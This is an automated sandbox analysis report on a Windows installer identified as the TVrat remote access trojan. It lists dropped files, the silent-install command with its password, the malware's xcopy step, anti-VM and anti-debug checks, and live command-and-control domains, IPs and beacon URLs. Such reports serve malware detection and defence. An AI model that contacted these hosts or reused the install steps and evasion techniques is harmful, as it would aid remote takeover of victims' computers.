                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_iscrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-951GK.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_iscrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-5IUGA.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\astrct.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\libjpeg-turbo-win.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\astclient.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\msvcr120.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\libeay32.dll (copy)
                          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\astclient.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-SD6OU.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-PDD2G.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\aw_sas32.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-UA1D6.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_setup64.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-4POLO.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\opus.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\libcryptoMD.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-82POG.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\astrct.dll (copy)
                          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\hatls.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\hatls.dll (copy)
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-2EBQK.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_setup64.tmp
                          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\libcurl.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\is-ND9BQ.tmp
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\opus.dll (copy)
                          Source: C:\Windows\SysWOW64\xcopy.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\im\libcryptoMD.dll
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mo6x\libcurl.dll (copy)
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe TID: 7012 | Thread sleep time: -710000s >= -30000s
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | File opened: PhysicalDrive0
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Last function: Thread delayed
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Thread sleep count: Count: 1473 delay: -10
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Code function: 11_2_07065021 lstrcat,FindFirstFileA,lstrcat,FindNextFileA,FindClose,11_2_07065021
                          Source: ast.exe.9.dr | Binary or memory string: VMware
                          Source: ast.exe, 0000000B.00000002.2513073562.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
                          Source: ast.exe.9.dr | Binary or memory string: VBoxService.exe
                          Source: ast.exe, 0000000B.00000002.2513073562.0000000000DB9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: wjpP1EOX0L.tmp, 00000001.00000002.1718627243.00000000006EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\{
                          Source: ast.exe, 0000000A.00000002.2979445587.0000000000C6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{L
                          Source: ast.exe.9.dr | Binary or memory string: VMWare
                          Source: ast.exe.9.dr | Binary or memory string: VBoxService.exeU
                          Source: C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | Process information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Code function: 10_2_6B91EB81 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6B91EB81
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Code function: 10_2_6B90AE50 WSAStartup,WSACleanup,GetModuleHandleA,GetProcAddress,_strpbrk,LoadLibraryA,GetProcAddress,GetSystemDirectoryA,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,if_nametoindex,QueryPerformanceFrequency,10_2_6B90AE50
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Code function: 10_2_6B931C01 mov eax, dword ptr fs:[00000030h] 10_2_6B931C01
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Code function: 10_2_6B92C43E mov eax, dword ptr fs:[00000030h] 10_2_6B92C43E
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Process token adjusted: Debug
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Code function: 10_2_6B91EB81 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6B91EB81
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Code function: 10_2_6B92EFE1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_2_6B92EFE1
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Code function: 10_2_6B91DC3A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_2_6B91DC3A
                          Source: C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp | Process created: C:\Users\user\Desktop\wjpP1EOX0L.exe "C:\Users\user\Desktop\wjpP1EOX0L.exe" /verysilent /password=uzx1m
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\xcopy.exe xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\mo6x\*" "C:\Users\user\AppData\Roaming\im\"
                          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\im\ast.exe "C:\Users\user\AppData\Roaming\im\ast.exe"
                          Source: ast.exe, 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, ast.exe.9.dr | Binary or memory string: Shell_TrayWndSVW
                          Source: ast.exe, 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, ast.exe.9.dr | Binary or memory string: Shell_TrayWnd
                          Source: ast.exe, 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, ast.exe.9.dr | Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SVW
                          Source: ast.exe, 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, ast.exe.9.dr | Binary or memory string: Shell_TrayWndTrayNotifyWndSV
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Code function: 10_2_6B91ED5B cpuid 10_2_6B91ED5B
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Code function: 10_2_6B92FBD1 GetSystemTimeAsFileTime,10_2_6B92FBD1
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                          Source: ast.exe, 0000000B.00000003.2498022961.0000000007063000.00000040.00000001.01000000.0000000E.sdmp | Binary or memory string: PROCEXP.EXE

                          Stealing of Sensitive Information

                          Source: Yara match | File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: ast.exe PID: 8036, type: MEMORYSTR
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\im\ast.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, type: DROPPED

                          Remote Access Functionality

                          Source: Yara match | File source: 10.0.ast.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0000000A.00000000.2386068044.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: ast.exe PID: 8036, type: MEMORYSTR
                          Source: Yara match | File source: C:\Users\user\AppData\Roaming\im\ast.exe, type: DROPPED
                          Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp, type: DROPPED
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Code function: 10_2_6B906D50 socket,socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,curl_msnprintf,send,recv,closesocket,closesocket,closesocket,closesocket,closesocket,10_2_6B906D50
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Code function: 10_2_6B8D39A0 curl_pushheader_bynum,inet_pton,htons,inet_pton,htons,htons,htons,bind,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,10_2_6B8D39A0
                          Source: C:\Users\user\AppData\Roaming\im\ast.exe | Code function: 10_2_6B8DEEA0 ___from_strstr_to_strchr,_strncpy,___from_strstr_to_strchr,inet_pton,_strncpy,___from_strstr_to_strchr,___from_strstr_to_strchr,curl_pushheader_bynum,getsockname,WSAGetLastError,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,curl_msnprintf,curl_easy_strerror,curl_easy_strerror,10_2_6B8DEEA0
                          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                          Gather Victim Identity Information | 1 Scripting | Valid Accounts | 2 Windows Management Instrumentation | 1 Scripting | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | OS Credential Dumping | 1 System Time Discovery | Remote Services | 12 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 Data Encrypted for Impact
                          Credentials | Domains | Default Accounts | 1 Native API | 1 DLL Side-Loading | 12 Process Injection | 3 Obfuscated Files or Information | LSASS Memory | 3 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
                          Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 1 Software Packing | Security Account Manager | 133 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
                          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 331 Security Software Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                          Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 23 Virtualization/Sandbox Evasion | SSH | Keylogging | 3 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                          Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 23 Virtualization/Sandbox Evasion | Cached Domain Credentials | 2 Process Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                          DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Process Injection | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                          Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 2 System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                          Behavior Graph ID: 1558734 | Sample: wjpP1EOX0L.exe | Startdate: 19/11/2024 | Architecture: WINDOWS | Score: 68
                          Sample signatures: Yara detected TVrat; AI detected suspicious sample
                          Domains: trs011.xn--80akicokc0aablc.xn--p1ai, id.xn--80akicokc0aablc.xn--p1ai, crypto-st.art
                          Process chain: wjpP1EOX0L.exe -> wjpP1EOX0L.tmp -> wjpP1EOX0L.exe -> wjpP1EOX0L.tmp -> cmd.exe -> xcopy.exe, ast.exe, conhost.exe (a second ast.exe node is started at the top level)
                          Dropped by wjpP1EOX0L.exe (both instances): C:\Users\user\AppData\...\wjpP1EOX0L.tmp, PE32
                          Dropped by first wjpP1EOX0L.tmp: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+; C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32
                          Dropped by second wjpP1EOX0L.tmp: C:\Users\user\AppData\...\quartz.dll (copy), PE32; C:\Users\user\AppData\...\opus.dll (copy), PE32; C:\Users\user\...\libssl-1_1.dll (copy), PE32; 29 other files (24 malicious)
                          Dropped by xcopy.exe: C:\Users\user\AppData\Roaming\im\quartz.dll, PE32; C:\Users\user\AppData\Roaming\im\opus.dll, PE32; C:\Users\user\AppData\...\libssl-1_1.dll, PE32; 12 other files (11 malicious)
                          Network (ast.exe): id.xn--80akicokc0aablc.xn--p1ai 212.193.169.65, 443, 44335, 49825 SAFIB-ASRU Russian Federation; trs011.xn--80akicokc0aablc.xn--p1ai 195.19.105.66, 44444, 50015 ROSTELECOM-ASRU Russian Federation; 127.0.0.1 unknown unknown
                          Signatures (ast.exe): Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to delay execution (extensive OutputDebugStringW loop); Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes); Tries to detect virtualization through RDTSC time measurements

                          Source | Detection | Scanner | Label | Link
                          wjpP1EOX0L.exe | 8% | ReversingLabs
                          Source | Detection | Scanner | Label | Link
                          C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-1C94S.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-9TM7I.tmp\wjpP1EOX0L.tmp | 3% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-H2GRU.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\is-JOUMC.tmp\wjpP1EOX0L.tmp | 3% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\AstCrp.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\ast.exe (copy) | 12% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\astclient.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\astrct.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\aw_sas32.dll (copy) | 4% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\hatls.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-2EBQK.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-2G518.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-4POLO.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-5IUGA.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-82POG.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-88TFK.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-951GK.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-ERH6U.tmp | 12% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-JCPUK.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-KGLTC.tmp | 4% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-PDD2G.tmp | 4% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-SD6OU.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-UA1D6.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\is-VCJTB.tmp | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\libcrypto-1_1.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\libcryptoMD.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\libcurl.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\libeay32.dll (copy) | 4% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\libjpeg-turbo-win.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\libssl-1_1.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\msvcr120.dll (copy) | 0% | ReversingLabs
                          C:\Users\user\AppData\Local\Temp\mo6x\opus.dll (copy) | 0% | ReversingLabs
                          No Antivirus matches
                          No Antivirus matches
Source | Detection | Scanner | Label | Link
Name | IP | Active | Malicious | Antivirus Detection | Reputation
trs011.xn--80akicokc0aablc.xn--p1ai | 195.19.105.66 | true | false | | unknown
id.xn--80akicokc0aablc.xn--p1ai | 212.193.169.65 | true | false | | high
crypto-st.art | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                          high
                                                                                          http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66uast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          http://www.kngstr.com/?PreDefines.ishawjpP1EOX0L.tmp, 00000001.00000003.1716936096.00000000021F5000.00000004.00001000.00020000.00000000.sdmp, wjpP1EOX0L.tmp, 00000003.00000003.2086719713.0000000002345000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://curl.haxx.se/Vast.exe, 0000000A.00000002.2997269858.000000006B954000.00000002.00000001.01000000.00000017.sdmp, is-JCPUK.tmp.3.dr, libcurl.dll.9.drfalse
                                                                                            high
                                                                                            https://datatracker.ietf.org/ipr/1914/ast.exe, 0000000A.00000000.2388256151.0000000000942000.00000002.00000001.01000000.0000000C.sdmp, ast.exe.9.drfalse
                                                                                              high
                                                                                              http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66wast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2856120074.0000000006087000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://sectigo.com/CPS0CwjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.drfalse
                                                                                                high
                                                                                                https://sectigo.com/CPS0Dxcopy.exe, 00000009.00000003.2083727096.00000000035DA000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2098265032.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2087883460.00000000033F7000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2097505417.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2089288252.000000000360A000.00000004.00000020.00020000.00000000.sdmp, opus.dll.9.dr, astrct.dll.9.dr, is-951GK.tmp.3.dr, is-UA1D6.tmp.3.drfalse
                                                                                                  high
                                                                                                  https://id.xn--80akicokc0aablc.xn--p1ai:443sw.~ast.exe, 0000000A.00000003.2670067675.000000000609D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66mast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66-80akicokc0aablc.xast.exe, 0000000A.00000003.2947103567.000000000609D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://id.xn--80akicokc0aablc.xn--p1ai:443ast.exe, 0000000A.00000003.2706718804.00000000060A2000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2696026958.00000000060F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://id.xn--80akicokc0aablc.xn--p1ai03ast.exe, 0000000A.00000002.2981320741.0000000002F84000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    https://id.xn--80akicokc0aablc.xn--p1ai:443...ast.exe, 0000000A.00000002.2982914474.000000000319B000.00000004.00001000.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2472544479.00000000060BA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66cast.exe, 0000000A.00000003.2746980219.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2096546624.00000000033F9000.00000004.00000020.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385110004.00000000033F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66east.exe, 0000000A.00000003.2797214316.0000000006064000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://www.sqlite.org/copyright.html.wjpP1EOX0L.tmp, 00000003.00000003.2082364759.000000000701D000.00000004.00001000.00020000.00000000.sdmp, xcopy.exe, 00000009.00000003.2385054264.00000000033F8000.00000004.00000020.00020000.00000000.sdmp, ast.exe, 0000000B.00000002.2515695685.0000000061EA0000.00000008.00000001.01000000.0000000D.sdmpfalse
                                                                                                        high
                                                                                                        https://id.xn--80akicokc0aablc.xn--p1ai00ast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66hast.exe, 0000000A.00000002.2979445587.0000000000CC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://crypto-st.art/update.php?id=142104603&stat=6f83f48b198bee1c21dc55ad2e0d1b66Yast.exe, 0000000A.00000002.2992252088.0000000006020000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://id.xn--80akicokc0aablc.xn--p1aillllast.exe, 0000000A.00000002.2979445587.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
